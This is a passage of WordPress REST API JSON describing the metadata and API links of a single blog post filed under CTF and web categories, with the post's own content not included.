[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-839","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/839","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=839"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/839\/revisions"}],"predecessor-version":[{"id":840,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/83
9\/revisions\/840"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=839"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=839"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=839"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}